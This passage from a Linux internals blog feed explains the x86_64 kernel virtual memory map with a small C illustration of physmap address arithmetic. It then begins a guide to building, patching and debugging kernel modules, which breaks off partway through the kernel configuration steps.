</p><p>Hopefully this has been a useful primer on one of the fundamentals of kernel memory allocation, the buddy allocator:</p><ul><li>We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel</li><li>We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peeks into the actual kernel code from the mm system</li><li>Finally we pieced together our understanding with some extras on how memory is managed by the kernel, its API and the pros/cons of the buddy allocator</li></ul><h2 id="next-time">Next Time!</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/hooray.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>The fun doesn&apos;t end here, don&apos;t you worry! We&apos;ve just scratched the surface. I hope you&apos;re ready to expand your repertoire of acronyms cos next time we&apos;ll be exploring the wonderful world of slab allocators: SLAB, SLUB &amp; SLOB. 
</p><p>Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that&apos;s for next time!</p><p>Thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :) </p><p>exit(0);</p><p></p>]]></content:encoded></item><item><title><![CDATA[Linternals: The Kernel Virtual Address Space]]></title><description><![CDATA[In this part of our journey into virtual memory in Linux, we cover the mystical kernel memory map and all it entails.]]></description><link>https://sam4k.com/linternals-virtual-memory-part-3/</link><guid isPermaLink="false">623768ce1b5b6d052837b4de</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 10 May 2022 19:30:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals-1.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/linternals-1.gif" alt="Linternals: The Kernel Virtual Address Space"><p>Alright, we really made it to part 3 eh? Not bad! 
Before we dive straight in, let&apos;s quickly go over what we covered in the <a href="https://sam4k.com/linternals-virtual-memory-0x02/">last part</a> on the user virtual address space:</p><ul><li>Very brief overview, with some examples, of using <code>procfs</code> for introspection</li><li>The various mappings that make up a typical user virtual address space</li><li>Which syscalls userspace programs make use of to set up their virtual address space</li><li>Finally tying up some extras with how threading &amp; ASLR fit into this picture</li></ul><p>This time we&apos;ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let&apos;s get stuck into chapter 5!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/unlimited_power.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="204"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</a>
<ul>
<li><a href="#one-mapping-to-rule-them-all">One Mapping To Rule Them All</a></li>
<li><a href="#kernel-virtual-memory-map">Kernel Virtual Memory Map</a></li>
<li><a href="#wrapping-up">Wrapping Up</a>
<ul>
<li><a href="#digging-deeper">Digging Deeper</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</h2><p>Casting our minds back to <a href="https://sam4k.com/linternals-virtual-memory-part-1/">part 1</a>, we&apos;ll recall that:</p><ul><li>Each process has its own, sandboxed virtual address space (VAS)</li><li>The VAS is vast, spanning all addressable memory</li><li>This VAS is split between the User VAS &amp; Kernel VAS<sup>[1]</sup></li></ul><p>As we touched on in part 1, and more so in part 2, to even set up its user VAS a process needs the kernel to carry out a series of syscalls (<code>brk()</code>, <code>mmap()</code>, <code>execve()</code> etc.)<sup>[2]</sup>.</p><p>This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??). </p><p>So if we&apos;re in usermode and we need the kernel to do something, like <code>mmap()</code> some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.</p><p>Essentially, a syscall acts as an interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number &amp; its arguments.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/image.png" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="771" height="251" srcset="https://sam4k.com/content/images/size/w600/2022/05/image.png 600w, https://sam4k.com/content/images/2022/05/image.png 771w" sizes="(min-width: 720px) 720px"></figure><p>This way the kernel can look up the function corresponding to the syscall number, sanitise the arguments (the userspace has no power here after all) and if everything looks good, it can carry out the privileged work, return to the syscall handler which can transition back to usermode, only allowing one thing to 
cross over: the result of the syscall.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/where_you_going.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="270"></figure><p>This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall<sup>[3]</sup>, what is it running and how does it know where to find it?</p><p>And THAT is where the kernel virtual address space comes in. Got there eventually, right?</p><hr><ol><li>The VAS is often so vast (e.g. on 64-bit systems), that rather than splitting the entire address space an upper &amp; lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.</li><li>We touched more on syscalls back in part 1, <a href="https://sam4k.com/linternals-virtual-memory-part-1/#user-mode-kernel-mode">&quot;User-mode &amp; Kernel-mode&quot;</a></li><li>In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that&apos;s something you&apos;d be into, feel free to poke me on <a href="https://twitter.com/sam4k1">Twitter</a></li></ol><h3 id="one-mapping-to-rule-them-all">One Mapping To Rule Them All</h3><p>Okay, so I know we&apos;re all eager to dig around the kernel VAS, but it&apos;s worth noting a fairly fundamental difference here: while each process has its own unique user VAS, <strong>they all share the same kernel VAS</strong>.</p><p>Huh? What exactly does this mean? Well, to put it simply, all our processes are interacting with the same kernel, so each process&apos;s kernel VAS maps to the same physical memory.</p><p>As such, any changes within the kernel will be reflected across all processes. 
It&apos;s important to note, and we&apos;ll cover the why in more detail later, when we&apos;re in usermode we have no read/write access to this kernel virtual address space.</p><p>This is an extremely high-level overview of the topic and the actual details will vary based on architecture &amp; security mitigations, but for now just remember that all processes share the same kernel VAS.</p><h3 id="kernel-virtual-memory-map">Kernel Virtual Memory Map</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/andsoitbegins.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="200"></figure><p>Unfortunately things aren&apos;t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace varies depending on architecture and unfortunately there isn&apos;t easy-to-visualise introspection via <code>procfs</code>.</p><p>As I&apos;ve mentioned before in Linternals, I&apos;ll be focusing on <code>x86_64</code> when architecture specifics come into play. So although we don&apos;t have <code>procfs</code>, we do have kernel docs!</p><p><code><a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">Documentation/x86/x86_64/mm.txt</a></code>, specifically, provides a <code>/proc/self/maps</code>-esque breakdown of the <code>x86_64</code> virtual memory map, including both UVAS &amp; KVAS; which is perfect for us<sup>[1]</sup>:</p><pre><code>========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________</code></pre><p><strong>Line 5</strong>: We&apos;ve touched on this previously: the lower portion of our virtual address space<sup>[2]</sup> makes up the userspace. Size varies per architecture. </p><p><strong>Line 8</strong>: Remember how the virtual address space spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.</p><p><strong>Line 16</strong>: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble), nowadays the space is also used to load hypervisors into.</p><p><strong>Line 17</strong>: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments<sup><a href="https://en-academic.com/dic.nsf/enwiki/1553430">[3]</a></sup>. </p><p>When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.</p><p><strong>Line 18</strong>: Defined by <code>__PAGE_OFFSET_BASE</code>, the &quot;physmap&quot; (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.</p><p>To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it&apos;s been mapped to actually points to some physical memory where that&apos;s been loaded to. </p><p>In another process, with its own virtual address space, that same virtual address may be mapped to a completely different physical memory address.</p><p>Unlike typical virtual addresses (we&apos;ll touch on how they&apos;re translated), addresses in the physmap region are called kernel logical addresses. 
Any given kernel logical address is a fixed offset (<code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36">PAGE_OFFSET</a></code>) from the corresponding physical address. </p><p>E.g. <code>PAGE_OFFSET == physical address 0x00</code>, <code>PAGE_OFFSET+0x01 == physical address 0x01</code> etc. etc.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/confused_larry.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="268"></figure><p><strong>Line 19</strong>: Not much more to say about these, other than it&apos;s an unused region!</p><p><strong>Line 20</strong><sup><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">[4]</a></sup>: Defined by <code>VMALLOC_START</code> and <code>VMALLOC_END</code>, this virtual memory region is reserved for non-contiguous physical memory allocations via the <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146">vmalloc()</a></code> family of kernel functions (aka highmem region). </p><p>This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the <code>vmalloc</code> region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered). &#xA0;	</p><p>This region is also used by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207">ioremap()</a></code>, which doesn&apos;t actually allocate physical memory like <code>vmalloc()</code> but instead allows you to map a specified physical address range. E.g. 
allocating virtual memory to map I/O stuff for your GPU.</p><p>To oversimplify, though we&apos;ll expand on later, as this region isn&apos;t simply <code>physical address = logical address - PAGE_OFFSET</code>, there&apos;s more overhead behind the scenes using <code>vmalloc()</code> which uses virtual addressing than say <code>kmalloc()</code>, which returns addresses from the physmap region.</p><p><strong>Line 21</strong>: Another unused memory region!</p><p><strong>Line 22</strong><sup><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">[5]</a></sup>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135">VMEMMAP_START</a></code>, this region is used by the <code><a href="https://www.kernel.org/doc/html/latest/vm/memory-model.html">SPARSEMEM</a></code> memory model in Linux to map the <code>vmemmap</code>. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.</p><p><strong>Line 23</strong>: Aaand another unused memory region!</p><p><strong>Line 24</strong><sup><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">[6]</a></sup>: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, <code>CONFIG_KASAN=y</code>, this region is used as shadow memory by KASAN.</p><p>This basically means KASAN uses this shadow memory to track memory state, which it can then compare later on with the original memory to make sure there&apos;s no shenanigans or undefined behaviour going on. </p><p><strong>Line 30</strong>: You get the idea, unused. 
</p><p><strong>Line 31</strong>: Straight from the comments, defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157">CPU_ENTRY_AREA_BASE</a></code>, &quot;<em>cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code</em>&quot;<sup><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">[7]</a></sup>. The <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">struct cpu_entry_area</a></code> can share more insights on its role.</p><p><code>CPU_ENTRY_AREA_BASE</code> is also used by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41">vaddr_end</a></code>, which along with <code>vaddr_start</code> marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).</p><p><strong>Line 32</strong>: Yep, unused region. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/theresmore.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="270"></figure><p><strong>Line 33</strong>: Enabled with <code>CONFIG_X86_ESPFIX64=y</code>, this region is used to, and I honestly don&apos;t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack...</p><p>Again, the comments can be insightful here, so feel free to take a gander at the implementation in <code><a href="https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c">arch/x86/kernel/espfix_64.c</a></code>.</p><p><strong>Line 34</strong>: Another unused region.</p><p><strong>Line 35</strong>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159">EFI_VA_START</a></code>, this region unsurprisingly is used for EFI related stuff. 
This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">The (Modern) Boot Process</a>.</p><p><strong>Line 36</strong>: More unused memory.</p><p><strong>Line 37</strong>: This region is used as a 1:1 mapping of the kernel&apos;s text section, defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50">__START_KERNEL_map</a></code>. As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.</p><p>This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we&apos;re debugging an <code>x86_64</code> target we can get a rough idea of what we&apos;re looking at just from the address.</p><p>If we see the <code>0xffffffff8.......</code> prefix then we know we&apos;re looking at the text section!</p><p><strong>Line 38</strong>: Any dynamically loaded (think <code>insmod</code>) modules are mapped into this region, which sits just above the kernel text mapping as we can see in the <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L144">definition</a>:</p><pre><code class="language-C">#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)</code></pre><p><strong>Line 39</strong>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151">FIXADDR_START</a></code>, this region is used for &quot;fix-mapped&quot; addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical memory at boot. 
</p><p>The <code><a href="https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30">fix_to_virt()</a></code> family of functions are used to work with these special addresses.</p><p><strong>Line 40</strong>: We actually snuck this into our last part! To recap, this region is: </p><blockquote>a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&apos;t require elevated privileges and hence the whole user -&gt; kernel mode context switch. Suffice to say it&apos;s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall</blockquote><p><strong>Line 41</strong>: Our final unused memory region!</p><hr><ol><li>The eagle-eyed will note there&apos;s a couple of diagrams in <a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">mm.txt</a>, one for 4-level page tables and one for 5-level. We&apos;ll touch on what this means in the next section, for now just know that 4-level is more common atm </li><li>Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on <code>x86_64</code> this is bits <code>47-63</code>. 
This leaves 2<sup>47</sup> bytes of addressing each for userspace and kernelspace (128TB each) </li><li><a href="https://en-academic.com/dic.nsf/enwiki/1553430">https://en-academic.com/dic.nsf/enwiki/1553430</a></li><li><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html</a></li><li><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead</a></li><li><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">https://www.kernel.org/doc/html/latest/dev-tools/kasan.html</a></li><li><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90</a></li></ol><h3 id="wrapping-up">Wrapping Up</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/thatstheend.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="500" height="250"></figure><p>We did it! We&apos;ve covered all the regions described in the kernel x86_64 4-level (we&apos;ll get to that in the next section) virtual memory map! </p><p>Hopefully there was enough detail here to provide some interesting context, but not so much that you might as well have been reading the source. For the more curious, we&apos;ll be focusing more on implementation details in the next part.</p><h4 id="digging-deeper">Digging Deeper </h4><p>If you&apos;re interested in exploring some of these concepts yourself, don&apos;t be scared away by the source! Diving into some of the <code>#define</code>&apos;s and symbols we&apos;ve mentioned so far and rooting around can be a good way to dive in. 
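</p><p>For example, here&apos;s a sketch of the physmap arithmetic and the user/kernel address split in plain userland C. The constants are the <code>x86_64</code> defaults with KASLR disabled (taken from the v5.17 headers), so treat the values as illustrative rather than something to hardcode:</p><pre><code class="language-C">#include &lt;assert.h&gt;
#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

/* x86_64 defaults with KASLR disabled (v5.17); illustrative only */
#define PAGE_OFFSET      0xffff888000000000ULL /* base of the physmap */
#define START_KERNEL_MAP 0xffffffff80000000ULL /* base of the kernel text mapping */

/* physmap: kernel logical address &lt;-&gt; physical address is a fixed offset */
static uint64_t virt_to_phys(uint64_t vaddr) { return vaddr - PAGE_OFFSET; }
static uint64_t phys_to_virt(uint64_t paddr) { return paddr + PAGE_OFFSET; }

/* the most significant bits pick the half: 0 = userspace, 1 = kernelspace */
static int is_kernel_addr(uint64_t vaddr) { return (int64_t)vaddr &lt; 0; }

int main(void)
{
    assert(virt_to_phys(PAGE_OFFSET + 0x1000) == 0x1000);
    assert(phys_to_virt(0x1000) == PAGE_OFFSET + 0x1000);
    assert(is_kernel_addr(START_KERNEL_MAP));       /* kernel text address */
    assert(!is_kernel_addr(0x00007fffdeadb000ULL)); /* userland address */
    printf(&quot;physical 0x1000 lives at 0x%llx in the physmap\n&quot;,
           (unsigned long long)phys_to_virt(0x1000));
    return 0;
}</code></pre><p>Comparing the bases above against a live system is also a nice way to see KASLR shifting things around.</p><p>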
<a href="https://elixir.bootlin.com/linux/latest/source">bootlin&apos;s Elixir Cross Referencer</a> is easy to use and you can jump about the source in your browser.</p><p>Additionally, playing around with <a href="https://github.com/osandov/drgn">drgn</a> (live kernel introspection), <a href="https://www.sourceware.org/gdb/">gdb</a> (we covered getting set up in <a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">this post</a>) and coding is a fun way to get stuck in and explore these memory topics.</p><h2 id="next-time">Next Time!</h2><p>After 3 parts, we&apos;ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; in both userspace and kernelspace.</p><p>Armed with this knowledge, we&apos;re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.</p><p>Next time we&apos;ll begin to take a look, at both an operating system and hardware level, at how this all works. 
I&apos;m not going to pretend I know how many parts that&apos;ll take!</p><p>Down the line I would also like to close this topic by bringing everything we&apos;ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.</p><p>Thanks for reading!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Patching, Instrumenting & Debugging Linux Kernel Modules]]></title><description><![CDATA[An introductory look into patching, instrumenting and debugging Linux kernel modules.]]></description><link>https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/</link><guid isPermaLink="false">61faeaa97742d008b38dcee4</guid><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 15 Apr 2022 16:13:50 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/computer.gif" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><p>So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">I posted about</a> recently. </p><p>Maybe my Google-fu wasn&apos;t on point, but it wasn&apos;t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.</p><p>Now, if we&apos;re talking about patching and instrumentation in the Linux kernel, I&apos;d be remiss not to at least touch on some debugging basics as well, right? 
So hopefully between those three topics we should be able to cover some good ground in this post!</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I&apos;ve also included the essentials my repo over at <a href="https://github.com/sam4k/linux-kernel-resources">sam4k/linux-kernel-resources</a>.</div></div><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#preamble">Preamble</a>
<ul>
<li><a href="#kernel-module">Kernel Module?</a></li>
</ul>
</li>
<li><a href="#getting-setup">Getting Setup</a>
<ul>
<li><a href="#building-the-kernel">Building The Kernel</a></li>
<li><a href="#module-patching">Module Patching</a></li>
<li><a href="#shortcuts-alternatives">Shortcuts &amp; Alternatives</a>
<ul>
<li><a href="#minimal-configs">Minimal Configs</a></li>
<li><a href="#skip-building-altogether">Skip Building Altogether</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#getting-stuck-in">Getting Stuck In</a>
<ul>
<li><a href="#patch-diffs">Patch Diffs</a></li>
<li><a href="#instrumentation">Instrumentation</a></li>
<li><a href="#debugging">Debugging</a>
<ul>
<li><a href="#gdb-debugging-stub">GDB Debugging Stub</a></li>
<li><a href="#vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</a></li>
<li><a href="#loadable-modules">Loadable Modules</a></li>
<li><a href="#misc-gdb-tips">Misc GDB Tips</a></li>
<li><a href="#other-stuff">Other Stuff</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#faq">FAQ</a></li>
<li><a href="#postamble">Postamble</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="preamble">Preamble</h2><p>This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.</p><p>When finding a vuln, or looking into an existing bug, I&apos;ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.</p><p>The only real hard requirement I assume is that you&apos;re doing your kernel stuff in a VM, as this&apos;ll make debugging the kernel a lot easier down the line.</p><h3 id="kernel-module">Kernel Module?</h3><p>In the early, early days (&lt;1995) the Linux kernel was truly monolithic. Any functionality needed to be built into the base kernel at build time and that was that. </p><p>Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.</p><p>These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/ready_to_roll.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><hr><ol><li><a href="https://tldp.org/HOWTO/Module-HOWTO/x73.html">The Linux Documentation Project: Introduction to Linux Loadable Kernel Modules</a></li><li><a href="https://wiki.archlinux.org/title/Kernel_module">ArchWiki: Kernel Module</a></li></ol><h2 id="getting-setup">Getting Setup</h2><p>Alright, let&apos;s get things set up, shall we? 
In this section I&apos;ll talk about how to get to a position where we&apos;re able to make changes to a kernel module, rebuild it and install it.</p><p>There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I&apos;ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.</p><p>So that&apos;s what we&apos;re going to do! Buckle up, let&apos;s see if I can keep this brief. First I&apos;ll quickly cover how to build the kernel and then move on to patching specific modules.</p><h3 id="building-the-kernel">Building The Kernel</h3><p>First things first, make sure you grab the necessary dependencies for building the kernel:</p><pre><code>$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves</code></pre><p>With that sorted, <strong>download</strong> the kernel version you&apos;re wanting to play with from <a href="https://kernel.org">kernel.org</a>:</p><pre><code class="language-sh">$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz</code></pre><p>If you&apos;re not sure what kernel version to go for, just pick one closest to your current environment, which you can check via the cmd <code>uname -r</code>; don&apos;t worry about patch versions or anything past the first two numbers, we ain&apos;t got no time for that.</p><p>Next let&apos;s <strong>extract </strong>the kernel source into our current dir and <code>cd</code> into it after:</p><pre><code class="language-sh">$ tar -xf linux-5.17.tar.xz &amp;&amp; cd linux-5.17</code></pre><p>Now we need to <strong>configure</strong> our kernel. 
The kernel configuration is stored in a file named <code>.config</code>, in the root of the kernel source tree (aka the dir we just <code>cd</code>&apos;d into).</p><p>On Debian-based distros you should be able to find your config at <code>/boot/config-$(uname -r)</code> or similar; on my Arch box it&apos;s compressed at <code>/proc/config.gz</code>:</p><pre><code class="language-sh">$ cp /boot/config-$(uname -r) .config</code></pre><p>This file contains all the configuration options for your kernel; if you want to play around with these you can use <code>make menuconfig</code> to tweak your config. Speaking of <strong>tweaking your config</strong>, you may want to make some changes:</p><ul><li>On Ubuntu, you&apos;ll likely encounter some key related issues if you try to build using their config, so set the following config values in your <code>.config</code>: <code>CONFIG_SYSTEM_TRUSTED_KEYS=&quot;&quot;</code>, <code>CONFIG_SYSTEM_REVOCATION_KEYS=&quot;&quot;</code></li><li>Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with <code><a href="https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html">CONFIG_DEBUG_INFO</a>=y</code> &amp;&amp; <code><a href="https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html">CONFIG_GDB_SCRIPTS</a>=y</code>; you can enable this easily by using the helper <code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code></li></ul><p>With <code>.config</code> ready, let&apos;s crack on. 
